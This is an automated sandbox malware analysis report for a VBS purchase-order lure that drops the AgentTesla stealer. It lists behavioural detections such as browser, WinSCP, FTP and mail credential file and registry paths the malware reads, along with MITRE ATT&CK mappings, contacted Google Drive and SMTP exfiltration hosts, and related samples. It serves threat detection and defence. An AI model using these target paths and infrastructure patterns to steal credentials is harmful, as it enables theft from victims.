            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 320, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 320, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts121
            Windows Management Instrumentation            		221
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		2
            Obfuscated Files or Information            		11
            Input Capture            		24
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)1
            Software Packing            		1
            Credentials in Registry            		1
            Query Registry            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS111
            Security Software Discovery            		Distributed Component Object Model11
            Input Capture            		2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets1
            Process Discovery            		SSH1
            Clipboard Data            		23
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion            		Cached Domain Credentials141
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            System Network Configuration Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430129 Sample: Texas_Tool_Purchase_Order#T... Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 29 smtp.privateemail.com 2->29 31 drive.usercontent.google.com 2->31 33 2 other IPs or domains 2->33 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 7 other signatures 2->53 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 63 VBScript performs obfuscated calls to suspicious functions 9->63 65 Suspicious powershell command line found 9->65 67 Wscript starts Powershell (via cmd or directly) 9->67 69 3 other signatures 9->69 12 powershell.exe 14 19 9->12         started        process6 dnsIp7 39 drive.usercontent.google.com 142.250.64.97, 443, 49706, 49715 GOOGLEUS United States 12->39 41 drive.google.com 142.250.81.238, 443, 49705, 49714 GOOGLEUS United States 12->41 71 Suspicious powershell command line found 12->71 73 Very long command line found 12->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 12->75 16 powershell.exe 17 12->16         started        19 conhost.exe 12->19         started        21 cmd.exe 1 12->21         started        signatures8 process9 signatures10 43 Writes to foreign memory regions 16->43 45 Found suspicious powershell code related to unpacking or dynamic code loading 16->45 23 wab.exe 15 8 16->23         started        27 cmd.exe 1 16->27         started        process11 dnsIp12 35 api.ipify.org 104.26.13.205, 443, 49716 CLOUDFLARENETUS United States 23->35 37 smtp.privateemail.com 66.29.159.53, 49717, 49718, 587 ADVANTAGECOMUS United States 23->37 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->55 57 Tries to steal Mail credentials (via file / registry access) 23->57 59 Tries to harvest and steal ftp login credentials 23->59 61 2 other signatures 23->61 signatures13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Texas_Tool_Purchase_Order#T18834-1.vbs26%ReversingLabsScript-WScript.Trojan.Guloader
            Texas_Tool_Purchase_Order#T18834-1.vbs30%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.81.238
            		truefalse
              		high
              drive.usercontent.google.com
              		142.250.64.97
              		truefalse
                		high
                api.ipify.org
                		104.26.13.205
                		truefalse
                  		high
                  smtp.privateemail.com
                  		66.29.159.53
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://drive.google.com/mmHwab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://sectigo.com/CPS0wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2564623687.000001D6C58A3000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://ocsp.sectigo.com0wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            • URL Reputation: malware
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://go.micropowershell.exe, 00000002.00000002.2564623687.000001D6C4BCD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://drive.googPpowershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://drive.google.com/5mwab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.googhpowershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://drive.usercontent.google.com/wab.exe, 00000008.00000002.3277379903.000000000056A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://drive.google.compowershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://smtp.privateemail.comwab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.compowershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.compowershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3898000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://apis.google.compowershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            142.250.64.97
                                                            		drive.usercontent.google.comUnited States
                                                            		15169GOOGLEUSfalse
                                                            104.26.13.205
                                                            		api.ipify.orgUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            66.29.159.53
                                                            		smtp.privateemail.comUnited States
                                                            		19538ADVANTAGECOMUSfalse
                                                            142.250.81.238
                                                            		drive.google.comUnited States
                                                            		15169GOOGLEUSfalse

                                                            General Information

                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1430129
                                                            Start date and time:2024-04-23 08:04:06 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 7m 40s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:10
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Texas_Tool_Purchase_Order#T18834-1.vbs
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winVBS@12/7@4/4
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 92%
                                                            • Number of executed functions: 88
                                                            • Number of non-executed functions: 23
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 3012 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 344 because it is empty
                                                            • Execution Graph export aborted for target wab.exe, PID 320 because it is empty
                                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            08:04:53API Interceptor1197x Sleep call for process: powershell.exe modified
                                                            08:05:39API Interceptor140609x Sleep call for process: wab.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.26.13.205SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                            • api.ipify.org/
                                                            Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                            • api.ipify.org/?format=json
                                                            ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                            • api.ipify.org/?format=json
                                                            Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/?format=json
                                                            E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/
                                                            E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/
                                                            SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                            • api.ipify.org/
                                                            66.29.159.53Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              e-dekont_swift-details.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                  Scan_IMG-Payment Sheet _Till Febuary 2024...bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                    1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                      1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                        https://www.wikiran.org/attachments/leaks/asbgroup//4d90f5a202dda02e5900334984637a7fd0d3b2e2/CIMB%20PAYMENT%200520.zipGet hashmaliciousAgentTeslaBrowse
                                                                          pAYMENTcOPY.com.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                            img.exeGet hashmaliciousAgentTeslaBrowse
                                                                              ORDER_4490_0003469.exeGet hashmaliciousAgentTeslaBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                smtp.privateemail.comSwift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 66.29.159.53
                                                                                e-dekont_swift-details.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 66.29.159.53
                                                                                17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 66.29.159.53
                                                                                Scan_IMG-Payment Sheet _Till Febuary 2024...bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 66.29.159.53
                                                                                1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 66.29.159.53
                                                                                1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 66.29.159.53
                                                                                https://www.wikiran.org/attachments/leaks/asbgroup//4d90f5a202dda02e5900334984637a7fd0d3b2e2/CIMB%20PAYMENT%200520.zipGet hashmaliciousAgentTeslaBrowse
                                                                                • 66.29.159.53
                                                                                pAYMENTcOPY.com.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                                • 66.29.159.53
                                                                                img.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 66.29.159.53
                                                                                ORDER_4490_0003469.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 66.29.159.53
                                                                                api.ipify.orgTRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 104.26.13.205
                                                                                gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                • 104.26.12.205
                                                                                Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 172.67.74.152
                                                                                QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.74.152
                                                                                https://florideskser.online/loginGet hashmaliciousUnknownBrowse
                                                                                • 172.67.74.152
                                                                                CE1KVxYp5t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                • 172.67.74.152
                                                                                Ve6VeFSgkz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                • 104.26.13.205
                                                                                z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.26.13.205
                                                                                https://www.wsj.pm/download.phpGet hashmaliciousNetSupport RATBrowse
                                                                                • 104.26.12.205
                                                                                doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.74.152

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSTRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 104.26.13.205
                                                                                New order-Docs0374.xlsGet hashmaliciousUnknownBrowse
                                                                                • 172.67.180.182
                                                                                gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                • 172.67.180.182
                                                                                BNP Paribas_RemittanceAdviceNotification106173036326.docGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.21.25.202
                                                                                Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 172.67.74.152
                                                                                72625413524.vbsGet hashmaliciousXWormBrowse
                                                                                • 172.67.215.45
                                                                                Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.215.45
                                                                                ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 172.67.134.136
                                                                                https://universewild.orgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                • 104.17.2.184
